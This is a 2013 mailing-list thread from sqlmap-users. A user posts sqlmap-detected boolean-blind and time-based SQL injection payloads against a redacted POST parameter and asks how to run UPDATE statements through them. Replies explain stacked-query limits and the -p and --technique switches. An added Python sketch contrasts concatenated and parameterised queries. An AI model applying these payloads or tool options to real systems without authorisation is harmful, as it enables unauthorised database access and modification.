Thread: [sqlmap-users] stacked queries and different injection points
From: Bruno G. <gar...@gm...> - 2013-02-18 00:03:47
Hello,

I have this injection:

Place: POST
Parameter: xxxxx
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND 'qGgA'='qGgA
Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

and I get this when using UPDATE

[WARNING] execution of custom SQL queries is only available when stacked queries are supported.

Is there any workaround for this?
Also, it shows that it detected two injections, and it's using the first one for doing the queries, is there any way I could test the queries with the second injection?

Thanks
From: Leon J. <leo...@gm...> - 2013-02-18 08:03:56
On Monday, February 18, 2013, Bruno Garcia wrote:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there any way I could test the queries with
> the second injection?

Hello,

I am not at a computer now, so this is out of my head.

If you want to test a specific parameter, use -p parameter_name; if you want to use a specific injection type that was detected, use --type=E as an example for error based injection.

--
Regards
L.
Sent using electronic mail ツ
From: Miroslav S. <mir...@gm...> - 2013-02-18 08:17:45
Hi.

It's very simple. If stacking of queries is not supported (e.g. id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple.

Bye

On 18.2.2013. 01:04, "Bruno Garcia" <gar...@gm...> wrote:

> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there any way I could test the queries with
> the second injection?
>
> Thanks
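Added example, not part of the original thread: a Python sketch of the point made in the message above, using the standard-library sqlite3 module as an assumed stand-in for the MySQL back end (table, data and function names are hypothetical and constructed). The driver rejects the stacked UPDATE, the concatenated SELECT is still altered by its input, and the bound-parameter form closes both.

```python
import sqlite3

def make_db():
    # Constructed sample data; sqlite3 is an assumed stand-in for the MySQL back end.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, price INTEGER)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?)",
                   [(1, "widget", 10), (2, "gadget", 20)])
    return db

def lookup_concat(db, item_id):
    """Vulnerable form: request input is concatenated into the statement."""
    sql = "SELECT name FROM items WHERE id = " + item_id
    try:
        return sorted(db.execute(sql).fetchall())
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        # execute() takes exactly one statement, so a stacked UPDATE never runs.
        return "rejected: " + type(exc).__name__

def lookup_bound(db, item_id):
    """Hardened form: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchall()

def prices(db):
    return [row[0] for row in db.execute("SELECT price FROM items ORDER BY id")]

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "1"))                               # normal lookup
    print(lookup_concat(db, "1; UPDATE items SET price = 0"))   # stacked: rejected
    print(prices(db))                                           # data unchanged
    print(lookup_concat(db, "1 OR 1=1"))                        # WHERE clause altered
    print(lookup_bound(db, "1 OR 1=1"))                         # bound: no rows
```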
From: Bernardo D. A. G. <ber...@gm...> - 2013-02-18 09:56:07
Hi Bruno,

On 18 February 2013 00:03, Bruno Garcia <gar...@gm...> wrote:

> Also, it shows that it detected two injections, and it's using the first one
> for doing the queries, is there anyway I could test the queries with the
> second injection?

--technique T to force only time-based SQL injection. Refer to the user's manual for further details on --technique switch.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
From: Leon J. <leo...@gm...> - 2013-02-18 11:32:04
On Monday, February 18, 2013, Bernardo Damele A. G. wrote:

> --technique T to force only time-based SQL injection. Refer to the
> user's manual for further details on --technique switch.

Apologies. It is technique not type :)

--
Regards
L.
Sent using electronic mail ツ